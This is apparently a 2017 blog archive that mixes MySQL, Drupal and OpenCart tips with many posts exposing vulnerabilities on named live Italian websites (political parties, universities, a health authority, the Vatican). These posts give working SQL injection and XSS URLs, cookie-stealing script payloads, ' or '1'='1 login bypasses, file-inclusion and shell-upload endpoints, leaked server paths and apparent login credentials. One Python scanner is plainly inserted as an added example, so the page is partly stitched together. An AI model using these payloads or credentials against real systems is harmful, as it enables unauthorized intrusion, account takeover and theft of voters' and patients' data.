
Posts

Showing posts from 2017

[FIX] ERROR 1436 (HY000) Thread stack overrun - mysql 5.7

How to fix Thread stack overrun with mysql 5.7 (and other versions)

Thread stack overrun with mysql 5.7 on Linux and Windows

Run the server with
mysqld --thread_stack=256k

or, to make the setting permanent, add to my.ini/my.cnf (server.cnf):

thread_stack = 256K


Further problems with mysql on Windows

On 64-bit Windows you will probably need to give a bigger value.
I've been forced to use
thread_stack = 512K on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL))






Generic errors with mysql_upgrade
ERROR 1436 (HY000) at line 1879: Thread stack overrun
ERROR 1436 (HY000) at line 1935

Use 'mysqld --thread_stack=#' to specify a bigger stack

How to log all the queries in mysql or mariadb - windows and linux

Log all your SQL queries on a MySQL server. Note: use this only on your test server and without a lot of workload or connections, otherwise you are going to fill all your disk space or exhaust the IO resources (and even the CPU, waiting for IO writes).

Make sure that your logs folder exists and use the same folder as the other MySQL logs (e.g. /var/log/mysql/).

Add to your my.ini/my.cnf (or server.cnf)


on Windows:
general_log_file="C:/yourWindowsMysql/logs/logsql.log"
general_log=1
on Linux/*nix add:
general_log_file="/var/log/mysqld-queries.log"
general_log=1

then restart your MySQL or MariaDB server.



https://www.movimento5stelle.it again | several vulnerabilities, system compromise

Old vulnerabilities and other information. The main website shares the same problems with http://rousseau.movimento5stelle.it.

NOTE/Disclaimer: if you are supposing to vote in a safe manner (It's less safe than the cheapest Italian service provider with an old version of commonly used scripts, like WordPress or Joomla, installed by your "cousin") I can tell you without problems that you are wrong and you've been tricked by your own leaders. I'm not responsible for what they are saying and doing ... you are.
The server mostly hasn't been updated for years, except for just what they thought was worth updating.
Please, do not contact me for legal issues. I haven't saved/stored and I do not share any particular *confidential* information. I've nothing to do with any problem that you are facing on those websites.
No, I'm not "politically attacking" anybody. Those, that you are probably supposing, are political speculations from your respecti…

Reggia di caserta - SQL Injection, system compromise, xss, etc | http://www.reggiadicaserta.beniculturali.it

Joomla 1.5.15 (Vulnerable) http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/
They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/

path: /var/www/reggiadicaserta

They also have malware (search the source code for http://www.freepokermoney.net or similar URLs):

http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886

Archived page: http://archive.is/3JJsi


WordPress 4.8.3 (with bogus plugin and theme) http://www.reggiadicaserta.beniculturali.it/wp/




The WordPress version is the "new" website, and they also "devastated" the already bad (malware-ridden) SEO optimization by not redirecting the old URLs. I feel very sorry for that. What a mess.



How to fix drupal installation with 32bit php version

Install Drupal on a server with a 32-bit version of PHP.
If you want to install Drupal on your TEST server even though you have a 32-bit version of PHP, you need to edit:
core/modules/system/system.install
and comment out (around line 973):


  if (PHP_INT_SIZE <= 4) {
    $requirements['limited_date_range'] = [
      'title' => t('Limited date range'),
      'value' => t('Your PHP installation has a limited date range.'),
      'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
      'severity' => REQUIREMENT_WARNING,
    ];
  }

Commenting this out only silences the requirement warning; the 1901-2038 date range limitation it describes still applies. It's highly suggested to update to a recent 64-bit version of PHP.

unina.it/ | blind sql injection, xss, data leak, system compromise etc

There's a sort of WAF on all the websites but it can be easily tricked by not using the most common terms like /passwd, etc.
-
http://www.dieti.unina.it
Ubuntu
Joomla 2.5.8

Admin can be changed (admin takeover) even if there's the external login for the users.
php files can be uploaded via
administrator/components/com_media/helpers/media.php

com_gcalendar  is vulnerable and should be upgraded to dpcalendar.

---

http://www.digita.unina.it/
wordpress 4.8.1
http://www.digita.unina.it/digita/wp-login.php
sds_dj32f
lizzi

---

http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error: http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/

---
XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E

---

SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(ne…

sefsas.it | sql injection

SQL injection in the email confirmation URL (there are several others):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

Full query sample in the output:

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived: http://archive.is/xDVeh

XSS
https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script>


SQL Injection
https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici

archived error: http://archive.is/9bJfo

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path + [FIX]

Simple fix (add this check before any other code in the affected files):
if (!defined('ABSPATH')) exit;
_________
URLs that can give you errors with local folder paths on WordPress 4.8.3 and previous versions:
/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/customize/class-wp-customize-nav…

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise

Joomla com_fabrik vulnerabilities

Raise the error related to the SQL injection:
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----

archived: http://archive.is/1Up6B

Upload vulnerability
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
archived: http://archive.is/6XtTl

Path (leaked from the errors):
/web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste italiane - Affrancatrice Polivalente PT100SV (Elettronica Meccanica Sistemi S.P.A.) - manuale per l'operatore

PT100SV software manual, release A8C6



Download the manual here


Mirrors:
filefactory.com: http://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf
share-online.biz: http://www.share-online.biz/dl/GRQZM4YOUSV
sendmyway.com: https://www.sendmyway.com/bgktennfvwqz
gigapeta.com: http://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it |path disclosure, xss, sql injections, shell upload

http://lesim1.ing.unisannio.it

We can start by detecting the version manually (automated tools, like joomscan, give random values) from
http://lesim1.ing.unisannio.it/configuration.php-dist
1.5.x
archived: http://archive.is/VB6I3

libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26.
components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23.

(Tip: I just used file and folder comparison with Beyond Compare, but you can also use Meld on Linux)



To get the path we try to raise errors with wrong SQL queries. In this case we are abusing the weblinks component and adding the filter_order parameter even though the site uses SEF URLs (who cares).

http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order=

to get an output like this:
No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHERE catid = 53 AND p…

http://www.orientamento.unisannio.it | path disclosure, xss, sql injections, shell upload, system compromise

http://www.orientamento.unisannio.it
The website uses PHP-Nuke with some customizations (sometimes it detects that we are trying to abuse specific bugs).

We can find the path from the Deprecated notices in various modules:
/var/www/html/copus/home/copus/modules/

ex.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive
Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25

register_globals seems to be On and the variables can be overridden via POST/GET requests.

Supposed version <= PHP-Nuke 6.9, since banners.php exists.

In banners.php we have

switch($op) { ... }
sample
http://www.orientamento.unisannio.it/banners.php?op=login

By using, for example, this url:
http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc
the SQL is executed and we can dump the data instead of the banners.

File via SQL
http://www.orientamento.unisannio.it/banners.php?op=Ok&login='…

cineca.it | XSS

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca

ex.:
http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca


archived with sample JavaScript text: http://archive.is/To5A4

http://www.carminevalentino.it/ | xss

http://www.carminevalentino.it/

The path can be seen in the 404 error pages:
D:\inetpub\webs\carminevalentinoit\


XSS

http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1


and we can place any video in the content

Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1


shortened url: https://goo.gl/sWhg1P
archived url: http://archive.is/25Bw8

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech is usually sending spam emails.

There's a fake unsubscribe script that reports the removal of anything, even if you pass it a simple XSS.

http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com

____

The mail server can be exploited with an old remote exploit for Postfix on Debian Linux (Shellshock).

hacksannio.it (... other websites) | path disclosure, system compromise

By simply requesting the theme URL
http://www.hacksannio.it/wp-content/themes/betheme/

we can raise an error:

Fatal error: Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php on line 10
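The fatal error above and the path-disclosure URLs in the WordPress post earlier on this page have the same cause: theme or plugin files that run code before checking they were loaded by WordPress, which the one-line ABSPATH guard fixes. As an added example (not code from the original posts), this Python script scans a local theme checkout for PHP files that do not check ABSPATH before their first statement; the sample files and directory layout are constructed here for the demo.

```python
import re
import tempfile
from pathlib import Path
from typing import List

# Matches defined('ABSPATH') / defined( "ABSPATH" ) in any spacing.
GUARD_RE = re.compile(r"""defined\s*\(\s*['"]ABSPATH['"]\s*\)""")


def has_abspath_guard(source: str) -> bool:
    """True if the first real statement of the file checks ABSPATH.

    A guard buried after other code does not count: the code before it
    has already run (and already raised a fatal error with the path).
    Files starting with namespace/declare statements are not special-cased.
    """
    body = re.sub(r"^\s*<\?php", "", source, count=1)          # opening tag
    body = re.sub(r"/\*.*?\*/", "", body, flags=re.S)            # block comments
    body = re.sub(r"^\s*(//|#).*$", "", body, flags=re.M)        # line comments
    first_stmt = body.strip().split(";", 1)[0]
    return bool(GUARD_RE.search(first_stmt))


def find_unguarded(root: Path) -> List[str]:
    """Relative paths of all .php files under root lacking the guard."""
    unguarded = []
    for path in sorted(root.rglob("*.php")):
        if not has_abspath_guard(path.read_text(errors="replace")):
            unguarded.append(path.relative_to(root).as_posix())
    return unguarded


# Constructed sample theme: two guarded files, two that would leak the path.
SAMPLE_FILES = {
    # the one-line fix from the post
    "functions.php": "<?php\nif (!defined('ABSPATH')) exit;\nadd_action('init', 'x');\n",
    # WordPress core style guard after a docblock
    "inc/helpers.php": "<?php\n/**\n * Helpers.\n */\nif ( ! defined( 'ABSPATH' ) ) {\n\texit;\n}\nfunction x() {}\n",
    # calls get_header() directly, like the theme index.php in the error above
    "index.php": "<?php\nget_header();\n?>\n<div>...</div>\n",
    # guard present but only after other code: still unguarded
    "sidebar.php": "<?php\ndynamic_sidebar('main');\nif (!defined('ABSPATH')) exit;\n",
}


def demo() -> List[str]:
    """Write the constructed theme to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, src in SAMPLE_FILES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(src)
        return find_unguarded(root)


if __name__ == "__main__":
    for name in demo():
        print("no ABSPATH guard before first statement:", name)
```

Run it against a real wp-content/themes/<theme> directory by calling find_unguarded(Path(...)); each reported file is one that should get the guard added at the top.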




_______________
Update:
After getting the possibility to execute code, it's possible to locally escalate to root privileges (expl. openrestinpeace) and cause a local DoS.

There are several other websites on the server:



w2.vatican.va photovat.com | XSS, path disclosure

Simple XSS
http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E

_____________________________________
Adobe Experience Manager CMS
A proxy is needed to connect, since they probably limited access to a range of IPs.
-> Sample working proxy: 5.152.158.4:8080
Admin access: https://w2.vatican.va:4502/admin

SSL verification must be disabled (OCSP on Firefox).

Update: it's possible to access
_____________________________________

Other websites
http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true

_____________________________________
http://www.photovat.com
IIS server
D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi

File Inclusion
dodosmail.php is a bogus contact email script.

http://www.movimento5stelle.it/parlamento/segnalazioni.html
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file]
example:
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html

archived page that shows the inclusion of an html page available on the server: http://archive.is/vHgOn

archived source of the movable type cgi (A bogus obsolete version used on the website): http://archive.is/20Uen
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi

The script can be triggered to show errors and the path:
Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58


XSS
There are various XSS and stored XSS in the profile area.

It's possi…

https://iscriviti.radicali.it | errors, path disclosure, system compromise

https://iscriviti.radicali.it

Directly accessing this URL we get an error with the paths:
https://iscriviti.radicali.it/Landing/RegistraDati

D:\xampp\htdocs\radicali\landing_iscrizione\index.php

They are using Windows and XAMPP, which are not the best solution for a production server that should store sensitive data.

The PHP scripts use the CodeIgniter framework.

The archived error page:
http://archive.is/PFw55


Access to phpMyAdmin
https://iscriviti.radicali.it/phpmyadmin/

user: root
password: ""


ftp:iscriviti.radicali.it
user: root
password: ""

update: it's not working anymore.

www.leganord.org | various security issues

Vulnerable Phoca Download

Possibility to embed different videos from YouTube:
www.leganord.org/index.php/documenti-politici/68-gianfranco-miglio/8741-quella-rivoluzione-dal-basso?videoid=[youtube video id]

They also have malware (not from me; a lot of porn stuff).
Google Cache:
http://webcache.googleusercontent.com/search?q=cache:r0-Y-VR0oHAJ:www.leganord.org/xIpV58pu_+&cd=11&hl=it&ct=clnk&gl=it

Copy of the cached page:
http://archive.is/7Vhy9


Note: they fixed the problems.

https://margot.partitodemocratico.it - path disclosure, system compromise

There is a path disclosure thanks to an error:
https://margot.partitodemocratico.it/nl/cancellami.php?e=test&secure=test
unsubscribe_v2.php

https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=[anything]&question=[anything]&answer=[anything]&e=[anything]&secure=[anything]&mid=[anything]
(original sample - https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=2&question=2&answer=si&e=ZWxpb3BvbGlAdGlzY2FsaS5pdA&secure=04912b36dcc08f33892266834a963bf0&mid=1eea )

It's possible to have access to the system.


Is it a "honeypot", as stated in the path?
It's possible, but they didn't fix the bugs and it's possible to access confidential data.
/repository/GCloud-WebRoot/margot.partitodemocratico.it/pd_margot_honeypot/


http://www.pdcampania.it - content injection, possible admin reset to external MX server

04/09/2017 http://www.pdcampania.it
wordpress 4.2.8

It's possible to inject content, reset the admin password and get the reset email delivered to an external MX server.

The website is down for restyling, but the WordPress scripts are still available to the public.

For example the admin area:
www.pdcampania.it/wp-admin

Content Models html5

Content Models

Metadata: Content that sets up the presentation or behavior of the rest of the content. These elements are found in the head of the document.
Elements: <base>, <link>, <meta>, <noscript>, <script>, <style>, <title>

Embedded: Content that imports other resources into the document.
Elements: <audio>, <video>, <canvas>, <iframe>, <img>, <math>, <object>, <svg>

Interactive: Content specifically intended for user interaction.
Elements: <a>, <audio>, <video>, <button>

Opencart 2.x - save settings for module or add module to layout

//loading the settings
$this->load->model('setting/setting');
$setting = $this->model_setting_setting->getSetting('mymodule');

//saving the settings: editSetting() takes the module code and the array of values
//(the POST data of the settings form), not just the code
$this->load->model('setting/setting');
$this->model_setting_setting->editSetting('mymodule', $this->request->post);

NOTE: in the form the input name="" must start with the name of the module. Example: mymodule_limit, mymodule_status, mymodule_othersetting


//getting data from the module - usually it is loaded by the configured layout
$this->load->model('extension/module');
$setting = $this->model_extension_module->getModuleByCode('mymodule');



//saving data for the module with a new id from the POST (saves a new one that can be loaded from the layout)
$this->load->model('extension/module');
if (!isset($this->request->get['module_id'])) { // $this->model_extension_module->addModule('mymodule', $t…

https://www.aslbenevento1.it/ | SQL Injection.

https://www.aslbenevento1.it/cupweb/
Ver. 20.11.00_003 28/04/17

Using
a' or '1'='1
as username and password gives access as
SGPWeb Operatore

If we raise an error:

errore di accesso al Data Base: ORA-01756: quoted string not properly terminated : SELECT password,description,user_code,connectingdate,users.sco_id from




http://www.beppegrillo.it https://rousseau.movimento5stelle.it | sql injection system compromise

A simple SQL injection is enough to log in as *any* user,
example: ' or '1'='1.

https://rousseau.movimento5stelle.it/login.php


SQL injection where sharing_id ends up in the GROUP BY clause.
https://rousseau.movimento5stelle.it/edit_atto.php?id=1258&sharing_id=[sqli]

http://www.beppegrillo.it/marcia_virtuale/vmarcia/auslesen.php?start=14040&z=[sqli]

sample for the voting system: voting_votazioni voting_votazioni_vote


The main website also uses Movable Type 4, with vulnerabilities.



Sample columns:
author_federated_id | author_federated_video                                                    | author_federated_comune_id | author_federated_candidato | author_federated_regione_id | author_federated_profile_id | author_federated_external_id | author_federated_provincia_id | author_federated_userpic_asset_id | author_federated_candidato_europa | author_federated_candidato_comune | author_federated_circoscrizione_id | author_federated_candidato_regione | author_federate…

one.com webcluster-ssl2.webpod5-cph3.one.com | mysql database and data dump.

webcluster-ssl2.webpod5-cph3.one.com
